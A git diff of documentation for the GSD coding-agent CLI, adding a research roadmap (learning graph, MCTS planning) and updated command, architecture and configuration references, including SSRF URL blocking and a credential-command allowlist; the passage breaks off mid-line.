+- **Embedding model:** Local (fast, private) or API (better quality, adds latency)? +- **Index format:** Simple cosine similarity on flat arrays vs. HNSW index? +- **Retrieval budget:** How many tokens to allocate to warm-tier retrievals per turn? +- **Coherence:** How to prevent retrieved historical context from confusing the model about the current state? + +--- + +## 5. Cross-Session Learning Graph + +**Category:** Self-Improvement +**Impact:** Transformative | **Effort:** High | **Priority:** #5 + +### What It Is + +GSD's memory system (MEMORY.md + individual files) stores flat, file-based memories. A learning graph extends this into a structured knowledge base that captures relationships between codebases, files, errors, solutions, and patterns across all sessions. + +This is informed by research on [agent memory architectures](https://github.com/Shichun-Liu/Agent-Memory-Paper-List) and the emerging discipline of [context engineering](https://thenewstack.io/memory-for-ai-agents-a-new-paradigm-of-context-engineering/). + +### Current Memory vs Learning Graph + +| Aspect | Current (MEMORY.md) | Learning Graph | +|--------|---------------------|----------------| +| **Structure** | Flat file list | Nodes + edges (graph) | +| **Relationships** | None | "file X often breaks when Y changes" | +| **Retrieval** | All loaded into context | Query-driven, only relevant nodes | +| **Learning** | Manual (user says "remember X") | Automatic from execution outcomes | +| **Scope** | Per-project directory | Per-project with cross-project patterns | +| **Staleness** | Manual cleanup | Confidence decay over time | + +### Graph Schema + +``` +┌──────────┐ touches ┌──────────┐ +│ Session │────────────────▶│ File │ +│ │ │ │ +│ • date │ │ • path │ +│ • outcome │ │ • type │ +│ • tokens │ │ • churn │ +└────┬──────┘ └─────┬─────┘ + │ │ + │ encountered │ involved_in + │ │ + ▼ ▼ +┌──────────┐ resolved_by ┌──────────┐ +│ Error │────────────────▶│ Solution │ +│ │ │ │ +│ • type │ │ • pattern │ +│ • message │ │ • success │ +│ • freq │ │ rate │ +└──────────┘ └──────────┘ + │ │ + │ prevented_by │ uses + │ │ + ▼ ▼ +┌──────────┐ ┌──────────┐ +│ Pattern │ │ Tool │ +│ │ │ │ +│ • type │ │ • name │ +│ • desc │ │ • avg │ +│ • conf │ │ time │ +└──────────┘ └──────────┘ +``` + +### Example Queries + +| Query | Result | +|-------|--------| +| "What errors have occurred in `auth.ts`?" | List of error nodes connected to that file node | +| "What's the typical fix for `TypeError` in this codebase?" | Solution nodes with highest success rate for that error type | +| "Which files tend to break together?" | File clusters with high co-occurrence in error sessions | +| "What tools are slowest in this project?" | Tool nodes sorted by avg execution time | + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `session-manager.ts` | Write graph nodes on session save | +| `agent-session.ts` prompt building | Query graph for relevant context before model call | +| Memory system (MEMORY.md) | Coexists — graph handles structured knowledge, memory handles preferences/feedback | +| Extension hook: `agent_end` | Trigger graph update with session outcome | + +### Storage Options + +| Option | Pros | Cons | +|--------|------|------| +| **SQLite + json columns** | Simple, no dependencies, fast queries | No native vector search | +| **SQLite + sqlite-vss** | Adds vector similarity to SQLite | Extra native dependency | +| **Flat JSON files** | Zero dependencies, git-friendly | Slow for large graphs | +| **LanceDB** | Embedded vector DB, no server | Additional dependency | + +### Open Questions + +- **Privacy:** Graph contains detailed codebase interaction history — should it be encrypted at rest? +- **Portability:** Should the graph travel with the project (`.claude/` dir) or stay user-local? +- **Garbage collection:** How to prune stale nodes (e.g., files that no longer exist)? + +--- + +## 6. MCTS-Based Planning + +**Category:** Intelligence +**Impact:** Transformative | **Effort:** Very High | **Priority:** #6 + +### What It Is + +Inspired by [ToolTree](https://www.agentic-patterns.com/patterns/skill-library-evolution/) and Monte Carlo Tree Search, this technique replaces GSD's linear action selection with a tree-based planner that explores multiple solution paths simultaneously. + +Instead of the model deciding one action at a time and hoping it works, the system: + +1. Generates N candidate next-actions +2. Scores each based on estimated probability of reaching the goal +3. Explores promising branches in parallel +4. Backtracks when a path fails, without wasting the user's context on dead ends + +### Current vs MCTS Approach + +**Current (linear):** +``` +User: "fix the auth bug" + │ + ▼ +Action 1: Read auth.ts ──▶ Action 2: Edit line 45 ──▶ Action 3: Run tests + │ + Tests fail ✗ + │ + ▼ + Action 4: Try different edit + │ + Tests fail ✗ + │ + ▼ + Action 5: Read error log... + (linear flailing) +``` + +**With MCTS (tree search):** +``` +User: "fix the auth bug" + │ + ▼ +Read auth.ts + │ + ├── Branch A: Edit line 45 (score: 0.6) + │ └── Run tests → FAIL → prune + │ + ├── Branch B: Check auth middleware (score: 0.7) ◀── highest score + │ └── Edit middleware.ts → Run tests → PASS ✓ + │ + └── Branch C: Check env config (score: 0.3) + └── (not explored — lower score) + +Result: Branch B succeeds after 2 actions, not 5+ +``` + +### Why It Fits GSD-2 + +GSD already has session branching primitives: +- `fork()` creates a branch from any message +- Branch summaries compress history at fork points +- Tree navigation (`/tree`) lets users explore branches +- Session tree is already a first-class concept + +The gap: these primitives are user-triggered. MCTS would make the agent trigger them automatically during problem-solving. + +### Architecture + +``` +┌─────────────────────────────────────────────────────────┐ +│ MCTS Planning Layer │ +│ │ +│ ┌─────────────┐ ┌──────────────┐ ┌────────────┐ │ +│ │ Proposer │───▶│ Scorer │───▶│ Selector │ │ +│ │ Generate N │ │ Estimate P │ │ Pick best │ │ +│ │ candidates │ │ of success │ │ to explore │ │ +│ └─────────────┘ └──────────────┘ └─────┬──────┘ │ +│ │ │ +│ ┌─────────────┐ ┌──────────────┐ │ │ +│ │ Pruner │◀───│ Executor │◀─────────┘ │ +│ │ Kill dead │ │ Run action │ │ +│ │ branches │ │ in worktree │ │ +│ └─────────────┘ └──────────────┘ │ +└─────────────────────────────────────────────────────────┘ + │ + ▼ +┌─────────────────────┐ +│ Agent Session │ +│ (receives winning │ +│ branch as result) │ +└─────────────────────┘ +``` + +### Scoring Approaches + +| Approach | Speed | Quality | Cost | +|----------|-------|---------|------| +| **Heuristic** (file relevance, error proximity) | Fast | Low | Free | +| **Fast model** (haiku-class rates candidates) | Medium | Medium | Low | +| **Self-evaluation** (main model rates its own proposals) | Slow | High | High | +| **Learned scorer** (trained on past outcomes from learning graph) | Fast | High | Free at inference | + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `agent-loop.ts` | New planning phase between user prompt and action execution | +| Session branching (`fork()`) | Used to create exploration branches | +| Git worktrees | Each branch explored in an isolated worktree | +| `agent-session.ts` | Receives the winning branch and presents it as the result | +| Skill Library Evolution (#1) | Provides learned patterns to improve the scorer over time | + +### Cost-Benefit Analysis + +| Factor | Value | +|--------|-------| +| **LLM calls per turn** | 2-5x more (proposal generation + scoring) | +| **Token usage** | 3-10x more per complex problem | +| **Success rate on hard problems** | Estimated 30-50% improvement | +| **Time to solution** | Fewer total turns despite more LLM calls per turn | +| **User experience** | Agent appears to "think harder" on hard problems | + +### Open Questions + +- **When to activate:** MCTS is expensive. Should it only activate when the agent detects a hard problem (repeated failures, high uncertainty)? +- **Branch isolation:** Git worktrees work for file changes, but how to isolate Bash side effects? +- **Budget control:** How many branches to explore before falling back to linear execution? +- **Transparency:** Should the user see the exploration tree or just the winning path? + +--- + +## Priority Matrix + +| # | Technique | Impact | Effort | Compounding | Dependencies | +|---|-----------|--------|--------|-------------|--------------| +| 1 | **Skill Library Evolution** | Massive | Medium | Yes — improves all other techniques | None | +| 2 | **DAG Tool Execution** | High | Medium | No — static speedup | None | +| 3 | **Speculative Tool Execution** | High | Low-Med | Yes — improves with learning | Benefits from #1 | +| 4 | **Semantic Context Compression** | High | High | No — static improvement | None | +| 5 | **Cross-Session Learning Graph** | Transformative | High | Yes — feeds #1, #3, #6 | Benefits from #1 | +| 6 | **MCTS Planning** | Transformative | Very High | Yes — improves with #1, #5 | Benefits from #1, #5 | + +### Recommended Implementation Order + +``` +Phase 1 (Foundation) Phase 2 (Performance) Phase 3 (Intelligence) +───────────────────── ───────────────────── ───────────────────── +┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ +│ Skill Library │ │ DAG Tool Exec │ │ Semantic Context│ +│ Evolution │──feeds──▶│ │ │ Compression │ +│ │ │ Speculative │ │ │ +│ │──feeds──▶│ Tool Exec │ │ MCTS Planning │ +└─────────────────┘ └─────────────────┘ └─────────────────┘ + │ ▲ +┌─────────────────┐ │ │ +│ Cross-Session │───────────────────┴──────────────────────────┘ +│ Learning Graph │ (feeds intelligence layer) +└─────────────────┘ +``` + +**Phase 1** creates the feedback loop that makes everything else better over time. +**Phase 2** delivers immediate, measurable performance wins. +**Phase 3** requires the most architectural change but delivers the deepest capability gains. + +--- + +## Sources & References + +### Papers + +- [SkillRL: Evolving Agents via Recursive Skill-Augmented RL](https://arxiv.org/abs/2602.08234) — ICLR 2026. Skill library evolution framework. +- [LLMCompiler: An LLM Compiler for Parallel Function Calling](https://arxiv.org/pdf/2312.04511) — ICML 2024. DAG-based tool execution. +- [Optimizing Agentic LLM Inference via Speculative Tool Calls](https://arxiv.org/pdf/2512.15834) — Speculative execution for agent tools. +- [RISE: Recursive Introspection for Self-Improvement](https://proceedings.neurips.cc/paper_files/paper/2024/file/639d992f819c2b40387d4d5170b8ffd7-Paper-Conference.pdf) — NeurIPS 2024. Self-improving LLM agents. +- [Don't Break the Cache: Prompt Caching for Agentic Tasks](https://arxiv.org/html/2601.06007v1) — Prompt caching evaluation. +- [Efficient LLM Serving for Agentic Workflows](https://arxiv.org/html/2603.16104v1) — Systems perspective on agent serving. + +### Industry & Analysis + +- [Context Engineering for Agents](https://rlancemartin.github.io/2025/06/23/context_engineering/) — Lance Martin's comprehensive guide. +- [AI Agent Context Compression Strategies](https://zylos.ai/research/2026-02-28-ai-agent-context-compression-strategies) — Zylos Research, Feb 2026. +- [Context Engineering for Coding Agents](https://martinfowler.com/articles/exploring-gen-ai/context-engineering-coding-agents.html) — Martin Fowler. +- [Memory for AI Agents: A New Paradigm](https://thenewstack.io/memory-for-ai-agents-a-new-paradigm-of-context-engineering/) — The New Stack. +- [LLM Compiler Agent Pattern](https://agent-patterns.readthedocs.io/en/stable/patterns/llm-compiler.html) — Agent Patterns documentation. +- [Skill Library Evolution Pattern](https://www.agentic-patterns.com/patterns/skill-library-evolution/) — Awesome Agentic Patterns. + +### Workshops & Events + +- [ICLR 2026 Workshop on AI with Recursive Self-Improvement](https://iclr.cc/virtual/2026/workshop/10000796) +- [Agent Memory Paper List](https://github.com/Shichun-Liu/Agent-Memory-Paper-List) — Comprehensive survey. +- [Awesome Context Engineering](https://github.com/Meirtz/Awesome-Context-Engineering) — Papers, frameworks, guides. diff --git a/docs/README.md b/docs/README.md index c37b303c0..f4b2d398b 100644 --- a/docs/README.md +++ b/docs/README.md @@ -11,7 +11,8 @@ Welcome to the GSD documentation. This covers everything from getting started to | [Commands Reference](./commands.md) | All commands, keyboard shortcuts, and CLI flags | | [Remote Questions](./remote-questions.md) | Discord and Slack integration for headless auto-mode | | [Configuration](./configuration.md) | Preferences, model selection, git settings, and token profiles | -| [Custom Models](./custom-models.md) | Add custom providers (Ollama, vLLM, LM Studio, proxies) via models.json | +| [Provider Setup](./providers.md) | Step-by-step setup for OpenRouter, Ollama, LM Studio, vLLM, and all supported providers | +| [Custom Models](./custom-models.md) | Advanced model configuration — models.json schema, compat flags, overrides | | [Token Optimization](./token-optimization.md) | Token profiles, context compression, complexity routing, and adaptive learning (v2.17) | | [Dynamic Model Routing](./dynamic-model-routing.md) | Complexity-based model selection, cost tables, escalation, and budget pressure (v2.19) | | [Captures & Triage](./captures-triage.md) | Fire-and-forget thought capture during auto-mode with automated triage (v2.19) | @@ -23,7 +24,7 @@ Welcome to the GSD documentation. This covers everything from getting started to | [Skills](./skills.md) | Bundled skills, skill discovery, and custom skill authoring | | [Migration from v1](./migration.md) | Migrating `.planning` directories from the original GSD | | [Troubleshooting](./troubleshooting.md) | Common issues, `/gsd doctor` (real-time visibility v2.40), `/gsd forensics` (full debugger v2.40), and recovery procedures | -| [Web Interface](./web-interface.md) | Browser-based project management with `pi --web` (v2.41) | +| [Web Interface](./web-interface.md) | Browser-based project management with `gsd --web` (v2.41) | | [VS Code Extension](../vscode-extension/README.md) | Chat participant, sidebar dashboard, and RPC integration for VS Code | ## Architecture & Internals @@ -34,6 +35,9 @@ Welcome to the GSD documentation. This covers everything from getting started to | [Native Engine](../native/README.md) | Rust N-API modules for performance-critical operations | | [ADR-001: Branchless Worktree Architecture](./ADR-001-branchless-worktree-architecture.md) | Decision record for the v2.14 git architecture | | [ADR-003: Pipeline Simplification](./ADR-003-pipeline-simplification.md) | Research merged into planning, mechanical completion (v2.30) | +| [ADR-004: Capability-Aware Model Routing](./ADR-004-capability-aware-model-routing.md) | Extend routing from tier/cost selection to task-capability matching | +| [ADR-007: Model Catalog Split](./ADR-007-model-catalog-split.md) | Separate model metadata from routing logic for extensibility | +| [Context Optimization Opportunities](./pi-context-optimization-opportunities.md) | Analysis of context window usage and optimization strategies | ## Pi SDK Documentation diff --git a/docs/architecture.md b/docs/architecture.md index a166c148b..381029731 100644 --- a/docs/architecture.md +++ b/docs/architecture.md @@ -14,7 +14,7 @@ gsd (CLI binary) ├─ resource-loader.ts Syncs bundled extensions + agents to ~/.gsd/agent/ └─ src/resources/ ├─ extensions/gsd/ Core GSD extension - ├─ extensions/... 12 supporting extensions + ├─ extensions/... 23 supporting extensions ├─ agents/ scout, researcher, worker ├─ AGENTS.md Agent routing instructions └─ GSD-WORKFLOW.md Manual bootstrap protocol @@ -73,6 +73,12 @@ Every dispatch creates a new agent session. The LLM starts with a clean context | **Remote Questions** | Discord, Slack, and Telegram integration for headless question routing | | **TTSR** | Tool-triggered system rules — conditional context injection based on tool usage | | **Universal Config** | Discovery of existing AI tool configurations (Claude Code, Cursor, Windsurf, etc.) | +| **AWS Auth** | AWS credential management and authentication | +| **Claude Code CLI** | Claude Code CLI integration | +| **cmux** | Context multiplexing for multi-session coordination | +| **GitHub Sync** | GitHub issue and PR synchronization | +| **Ollama** | Local Ollama model integration | +| **Shared** | Shared utilities across extensions | ## Bundled Agents @@ -122,7 +128,7 @@ The auto mode dispatch pipeline: Phase skipping (from token profile) gates steps 2-3: if a phase is skipped, the corresponding unit type is never dispatched. -## Key Modules (v2.33) +## Key Modules (v2.67) | Module | Purpose | |--------|---------| @@ -160,3 +166,11 @@ Phase skipping (from token profile) gates steps 2-3: if a phase is skipped, the | `memory-extractor.ts` | Extract reusable knowledge from session transcripts | | `memory-store.ts` | Persistent memory store for cross-session knowledge | | `queue-order.ts` | Milestone queue ordering | +| `context-masker.ts` | Context masking for model routing optimization | +| `phase-anchor.ts` | Phase anchoring for dispatch pipeline | +| `slice-parallel-orchestrator.ts` | Slice-level parallelism with dependency-aware dispatch | +| `slice-parallel-eligibility.ts` | Slice parallel eligibility checks | +| `slice-parallel-conflict.ts` | Slice parallel conflict detection | +| `preferences-models.ts` | Model preferences configuration | +| `preferences-validation.ts` | Preferences validation | +| `preferences-types.ts` | Preferences type definitions | diff --git a/docs/commands.md b/docs/commands.md index 5826978df..1ed935f8b 100644 --- a/docs/commands.md +++ b/docs/commands.md @@ -9,12 +9,16 @@ | `/gsd auto` | Autonomous mode — research, plan, execute, commit, repeat | | `/gsd quick` | Execute a quick task with GSD guarantees (atomic commits, state tracking) without full planning overhead | | `/gsd stop` | Stop auto mode gracefully | +| `/gsd pause` | Pause auto-mode (preserves state, `/gsd auto` to resume) | | `/gsd steer` | Hard-steer plan documents during execution | | `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) | | `/gsd status` | Progress dashboard | +| `/gsd widget` | Cycle dashboard widget: full / small / min / off | | `/gsd queue` | Queue and reorder future milestones (safe during auto mode) | | `/gsd capture` | Fire-and-forget thought capture (works during auto mode) | | `/gsd triage` | Manually trigger triage of pending captures | +| `/gsd dispatch` | Dispatch a specific phase directly (research, plan, execute, complete, reassess, uat, replan) | +| `/gsd history` | View execution history (supports `--cost`, `--phase`, `--model` filters) | | `/gsd forensics` | Full-access GSD debugger — structured anomaly detection, unit traces, and LLM-guided root-cause analysis for auto-mode failures | | `/gsd cleanup` | Clean up GSD state files and stale worktrees | | `/gsd visualize` | Open workflow visualizer (progress, deps, metrics, timeline) | @@ -22,6 +26,11 @@ | `/gsd export --html --all` | Generate retrospective reports for all milestones at once | | `/gsd update` | Update GSD to the latest version in-session | | `/gsd knowledge` | Add persistent project knowledge (rule, pattern, or lesson) | +| `/gsd fast` | Toggle service tier for supported models (prioritized API routing) | +| `/gsd rate` | Rate last unit's model tier (over/ok/under) — improves adaptive routing | +| `/gsd changelog` | Show categorized release notes | +| `/gsd logs` | Browse activity logs, debug logs, and metrics | +| `/gsd remote` | Control remote auto-mode | | `/gsd help` | Categorized command reference with descriptions for all GSD subcommands | ## Configuration & Diagnostics @@ -33,6 +42,9 @@ | `/gsd config` | Re-run the provider setup wizard (LLM provider + tool keys) | | `/gsd keys` | API key manager — list, add, remove, test, rotate, doctor | | `/gsd doctor` | Runtime health checks with auto-fix — issues surface in real time across widget, visualizer, and HTML reports (v2.40) | +| `/gsd inspect` | Show SQLite DB diagnostics | +| `/gsd init` | Project init wizard — detect, configure, bootstrap `.gsd/` | +| `/gsd setup` | Global setup status and configuration | | `/gsd skill-health` | Skill lifecycle dashboard — usage stats, success rates, token trends, staleness warnings | | `/gsd skill-health ` | Detailed view for a single skill | | `/gsd skill-health --declining` | Show only skills flagged for declining performance | @@ -48,8 +60,10 @@ | `/gsd new-milestone` | Create a new milestone | | `/gsd skip` | Prevent a unit from auto-mode dispatch | | `/gsd undo` | Revert last completed unit | -| Park milestone | Available via `/gsd` wizard → "Milestone actions" → "Park" | -| Unpark milestone | Available via `/gsd` wizard → "Milestone actions" → "Unpark" | +| `/gsd undo-task` | Reset a specific task's completion state (DB + markdown) | +| `/gsd reset-slice` | Reset a slice and all its tasks (DB + markdown) | +| `/gsd park` | Park a milestone — skip without deleting | +| `/gsd unpark` | Reactivate a parked milestone | | Discard milestone | Available via `/gsd` wizard → "Milestone actions" → "Discard" | ## Parallel Orchestration @@ -65,6 +79,46 @@ See [Parallel Orchestration](./parallel-orchestration.md) for full documentation. +## Workflow Templates (v2.42) + +| Command | Description | +|---------|-------------| +| `/gsd start` | Start a workflow template (bugfix, spike, feature, hotfix, refactor, security-audit, dep-upgrade, full-project) | +| `/gsd start resume` | Resume an in-progress workflow | +| `/gsd templates` | List available workflow templates | +| `/gsd templates info ` | Show detailed template info | + +## Custom Workflows (v2.42) + +| Command | Description | +|---------|-------------| +| `/gsd workflow new` | Create a new workflow definition (via skill) | +| `/gsd workflow run ` | Create a run and start auto-mode | +| `/gsd workflow list` | List workflow runs | +| `/gsd workflow validate ` | Validate a workflow definition YAML | +| `/gsd workflow pause` | Pause custom workflow auto-mode | +| `/gsd workflow resume` | Resume paused custom workflow auto-mode | + +## Extensions + +| Command | Description | +|---------|-------------| +| `/gsd extensions list` | List all extensions and their status | +| `/gsd extensions enable ` | Enable a disabled extension | +| `/gsd extensions disable ` | Disable an extension | +| `/gsd extensions info ` | Show extension details | + +## cmux Integration + +| Command | Description | +|---------|-------------| +| `/gsd cmux status` | Show cmux detection, prefs, and capabilities | +| `/gsd cmux on` | Enable cmux integration | +| `/gsd cmux off` | Disable cmux integration | +| `/gsd cmux notifications on/off` | Toggle cmux desktop notifications | +| `/gsd cmux sidebar on/off` | Toggle cmux sidebar metadata | +| `/gsd cmux splits on/off` | Toggle cmux visual subagent splits | + ## GitHub Sync (v2.39) | Command | Description | @@ -116,6 +170,14 @@ Enable with `github.enabled: true` in preferences. Requires `gh` CLI installed a | `gsd --print "msg"` (`-p`) | Single-shot prompt mode (no TUI) | | `gsd --mode ` | Output mode for non-interactive use | | `gsd --list-models [search]` | List available models and exit | +| `gsd --web [path]` | Start browser-based web interface (optional project path) | +| `gsd --worktree` (`-w`) [name] | Start session in a git worktree (auto-generates name if omitted) | +| `gsd --no-session` | Disable session persistence | +| `gsd --extension ` | Load an additional extension (can be repeated) | +| `gsd --append-system-prompt ` | Append text to the system prompt | +| `gsd --tools ` | Comma-separated list of tools to enable | +| `gsd --version` (`-v`) | Print version and exit | +| `gsd --help` (`-h`) | Print help and exit | | `gsd sessions` | Interactive session picker — list all saved sessions for the current directory and choose one to resume | | `gsd --debug` | Enable structured JSONL diagnostic logging for troubleshooting dispatch and state issues | | `gsd config` | Set up global API keys for search and docs tools (saved to `~/.gsd/agent/auth.json`, applies to all projects). See [Global API Keys](./configuration.md#global-api-keys-gsd-config). | diff --git a/docs/configuration.md b/docs/configuration.md index 4e99196d6..00512fa22 100644 --- a/docs/configuration.md +++ b/docs/configuration.md @@ -1,14 +1,14 @@ # Configuration -GSD preferences live in `~/.gsd/preferences.md` (global) or `.gsd/preferences.md` (project-local). Manage interactively with `/gsd prefs`. +GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project-local). Manage interactively with `/gsd prefs`. ## `/gsd prefs` Commands | Command | Description | |---------|-------------| | `/gsd prefs` | Open the global preferences wizard (default) | -| `/gsd prefs global` | Interactive wizard for global preferences (`~/.gsd/preferences.md`) | -| `/gsd prefs project` | Interactive wizard for project preferences (`.gsd/preferences.md`) | +| `/gsd prefs global` | Interactive wizard for global preferences (`~/.gsd/PREFERENCES.md`) | +| `/gsd prefs project` | Interactive wizard for project preferences (`.gsd/PREFERENCES.md`) | | `/gsd prefs status` | Show current preference files, merged values, and skill resolution status | | `/gsd prefs wizard` | Alias for `/gsd prefs global` | | `/gsd prefs setup` | Alias for `/gsd prefs wizard` — creates preferences file if missing | @@ -42,8 +42,8 @@ token_profile: balanced | Scope | Path | Applies to | |-------|------|-----------| -| Global | `~/.gsd/preferences.md` | All projects | -| Project | `.gsd/preferences.md` | Current project only | +| Global | `~/.gsd/PREFERENCES.md` | All projects | +| Project | `.gsd/PREFERENCES.md` | Current project only | **Merge behavior:** - **Scalar fields** (`skill_discovery`, `budget_ceiling`): project wins if defined @@ -159,6 +159,8 @@ Recommended verification order: | `GSD_PROJECT_ID` | (auto-hash) | Override the automatic project identity hash. Per-project state goes to `$GSD_HOME/projects//` instead of the computed hash. Useful for CI/CD or sharing state across clones of the same repo. (v2.39) | | `GSD_STATE_DIR` | `$GSD_HOME` | Per-project state root. Controls where `projects//` directories are created. Takes precedence over `GSD_HOME` for project state. | | `GSD_CODING_AGENT_DIR` | `$GSD_HOME/agent` | Agent directory containing managed resources, extensions, and auth. Takes precedence over `GSD_HOME` for agent paths. | +| `GSD_ALLOWED_COMMAND_PREFIXES` | (built-in list) | Comma-separated command prefixes allowed for `!command` value resolution. Overrides `allowedCommandPrefixes` in settings.json. See [Custom Models — Command Allowlist](custom-models.md#command-allowlist). | +| `GSD_FETCH_ALLOWED_URLS` | (none) | Comma-separated hostnames exempted from `fetch_page` URL blocking. Overrides `fetchAllowedUrls` in settings.json. See [URL Blocking](#url-blocking-fetch_page). | ## All Settings @@ -346,6 +348,43 @@ verification_max_retries: 2 # max retry attempts (default: 2) | `verification_auto_fix` | boolean | `true` | Auto-retry when verification fails | | `verification_max_retries` | number | `2` | Maximum auto-fix retry attempts | +### URL Blocking (`fetch_page`) + +The `fetch_page` tool blocks requests to private and internal network addresses to prevent server-side request forgery (SSRF). This protects against the agent being tricked into accessing internal services, cloud metadata endpoints, or local files. + +**Blocked by default:** + +| Category | Examples | +|----------|----------| +| Private IP ranges | `10.x.x.x`, `172.16-31.x.x`, `192.168.x.x`, `127.x.x.x` | +| Link-local / cloud metadata | `169.254.x.x` (AWS/GCP instance metadata) | +| Cloud metadata hostnames | `metadata.google.internal`, `instance-data` | +| Localhost | `localhost` (any port) | +| Non-HTTP protocols | `file://`, `ftp://` | +| IPv6 private ranges | `::1`, `fc00:`, `fd`, `fe80:` | + +Public URLs (`https://example.com`, `http://8.8.8.8`) are not affected. + +**Allowing specific internal hosts:** + +If you need the agent to fetch from internal URLs (self-hosted docs, internal APIs behind a VPN), add their hostnames to `fetchAllowedUrls` in global settings (`~/.gsd/agent/settings.json`): + +```json +{ + "fetchAllowedUrls": ["internal-docs.company.com", "192.168.1.50"] +} +``` + +Alternatively, set the `GSD_FETCH_ALLOWED_URLS` environment variable (comma-separated). The env var takes precedence over settings.json: + +```bash +export GSD_FETCH_ALLOWED_URLS="internal-docs.company.com,192.168.1.50" +``` + +Allowed hostnames bypass the blocklist checks. The protocol restriction (HTTP/HTTPS only) still applies — `file://` and `ftp://` cannot be allowlisted. + +> **Note:** This setting is global-only. Project-level settings.json cannot override the URL allowlist — this prevents a cloned repo from directing `fetch_page` at internal infrastructure. + ### `auto_report` (v2.26) Auto-generate HTML reports after milestone completion: @@ -374,8 +413,8 @@ git: auto_push: false # push commits to remote after committing push_branches: false # push milestone branch to remote remote: origin # git remote name - snapshots: false # WIP snapshot commits during long tasks - pre_merge_check: false # run checks before worktree merge (true/false/"auto") + snapshots: true # WIP snapshot commits during long tasks + pre_merge_check: auto # run checks before worktree merge (true/false/"auto") commit_type: feat # override conventional commit prefix main_branch: main # primary branch name merge_strategy: squash # how worktree branches merge: "squash" or "merge" @@ -392,8 +431,8 @@ git: | `auto_push` | boolean | `false` | Push commits to remote after committing | | `push_branches` | boolean | `false` | Push milestone branch to remote | | `remote` | string | `"origin"` | Git remote name | -| `snapshots` | boolean | `false` | WIP snapshot commits during long tasks | -| `pre_merge_check` | bool/string | `false` | Run checks before merge (`true`/`false`/`"auto"`) | +| `snapshots` | boolean | `true` | WIP snapshot commits during long tasks | +| `pre_merge_check` | bool/string | `"auto"` | Run checks before merge (`true`/`false`/`"auto"`) | | `commit_type` | string | (inferred) | Override conventional commit prefix (`feat`, `fix`, `refactor`, `docs`, `test`, `chore`, `perf`, `ci`, `build`, `style`) | | `main_branch` | string | `"main"` | Primary branch name | | `merge_strategy` | string | `"squash"` | How worktree branches merge: `"squash"` (combine all commits) or `"merge"` (preserve individual commits) | @@ -494,6 +533,14 @@ notifications: on_attention: true # notify when manual attention needed ``` +**macOS delivery:** GSD uses [`terminal-notifier`](https://github.com/julienXX/terminal-notifier) when available, falling back to `osascript`. We recommend installing `terminal-notifier` for reliable notification delivery: + +```bash +brew install terminal-notifier +``` + +Why: `osascript display notification` is attributed to your terminal app (Ghostty, iTerm2, etc.), which may not have notification permissions in System Settings → Notifications. `terminal-notifier` registers as its own app and prompts for permission on first use. See [Troubleshooting: Notifications not appearing on macOS](troubleshooting.md#notifications-not-appearing-on-macos) if notifications aren't working. + ### `remote_questions` Route interactive questions to Slack or Discord for headless auto mode: @@ -578,7 +625,7 @@ prefer_skills: avoid_skills: [] ``` -Skills can be bare names (looked up in `~/.gsd/agent/skills/`) or absolute paths. +Skills can be bare names (looked up in `~/.agents/skills/` and `.agents/skills/`) or absolute paths. ### `skill_rules` @@ -639,6 +686,7 @@ Complexity-based model routing. See [Dynamic Model Routing](./dynamic-model-rout ```yaml dynamic_routing: enabled: true + capability_routing: true # score models by task capability (v2.59) tier_models: light: claude-haiku-4-5 standard: claude-sonnet-4-6 @@ -648,6 +696,48 @@ dynamic_routing: cross_provider: true ``` +### `context_management` (v2.59) + +Controls observation masking and tool result truncation during auto-mode sessions. Reduces context bloat between compactions with zero LLM overhead. + +```yaml +context_management: + observation_masking: true # replace old tool results with placeholders (default: true) + observation_mask_turns: 8 # keep results from last N user turns (1-50, default: 8) + compaction_threshold_percent: 0.70 # target compaction at 70% context usage (0.5-0.95, default: 0.70) + tool_result_max_chars: 800 # cap individual tool result content (200-10000, default: 800) +``` + +### `service_tier` (v2.42) + +OpenAI service tier preference for supported models. Toggle with `/gsd fast`. + +| Value | Behavior | +|-------|----------| +| `"priority"` | Priority tier — 2x cost, faster responses | +| `"flex"` | Flex tier — 0.5x cost, slower responses | +| (unset) | Default tier | + +```yaml +service_tier: priority +``` + +### `forensics_dedup` (v2.43) + +Opt-in: search existing issues and PRs before filing from `/gsd forensics`. Uses additional AI tokens. + +```yaml +forensics_dedup: true # default: false +``` + +### `show_token_cost` (v2.44) + +Opt-in: show per-prompt and cumulative session token cost in the footer. + +```yaml +show_token_cost: true # default: false +``` + ### `auto_visualize` Show the workflow visualizer automatically after milestone completion: @@ -734,6 +824,13 @@ notifications: # Visualizer auto_visualize: true +# Service tier +service_tier: priority # "priority" or "flex" (for /gsd fast) + +# Diagnostics +forensics_dedup: true # deduplicate before filing forensics issues +show_token_cost: true # show per-prompt cost in footer + # Hooks post_unit_hooks: - name: code-review diff --git a/docs/context-and-hooks/07-the-system-prompt-anatomy.md b/docs/context-and-hooks/07-the-system-prompt-anatomy.md index aa0fc79ea..7bb2c57cc 100644 --- a/docs/context-and-hooks/07-the-system-prompt-anatomy.md +++ b/docs/context-and-hooks/07-the-system-prompt-anatomy.md @@ -174,7 +174,7 @@ When a skill file references a relative path, resolve it against the skill direc commit-outstanding Commit all uncommitted files in logical groups - /Users/you/.gsd/agent/skills/commit-outstanding/SKILL.md + /Users/you/.agents/skills/commit-outstanding/SKILL.md ``` diff --git a/docs/custom-models.md b/docs/custom-models.md index 943d213bf..76e949676 100644 --- a/docs/custom-models.md +++ b/docs/custom-models.md @@ -131,6 +131,36 @@ The `apiKey` and `headers` fields support three formats: "apiKey": "sk-..." ``` +#### Command Allowlist + +Shell commands (`!command`) are restricted to a set of known credential tools. Only commands starting with one of these are allowed to execute: + +`pass`, `op`, `aws`, `gcloud`, `vault`, `security`, `gpg`, `bw`, `gopass`, `lpass` + +Commands not on this list are blocked and the value resolves to `undefined`. A warning is written to stderr. + +Shell operators (`;`, `|`, `&`, `` ` ``, `$`, `>`, `<`) are also blocked in command arguments to prevent injection. + +**Customizing the allowlist:** + +If you use a credential tool not on the default list, override it in global settings (`~/.gsd/agent/settings.json`): + +```json +{ + "allowedCommandPrefixes": ["pass", "op", "sops", "doppler", "mycli"] +} +``` + +This replaces the default list entirely — include any defaults you still want. + +Alternatively, set the `GSD_ALLOWED_COMMAND_PREFIXES` environment variable (comma-separated). The env var takes precedence over settings.json: + +```bash +export 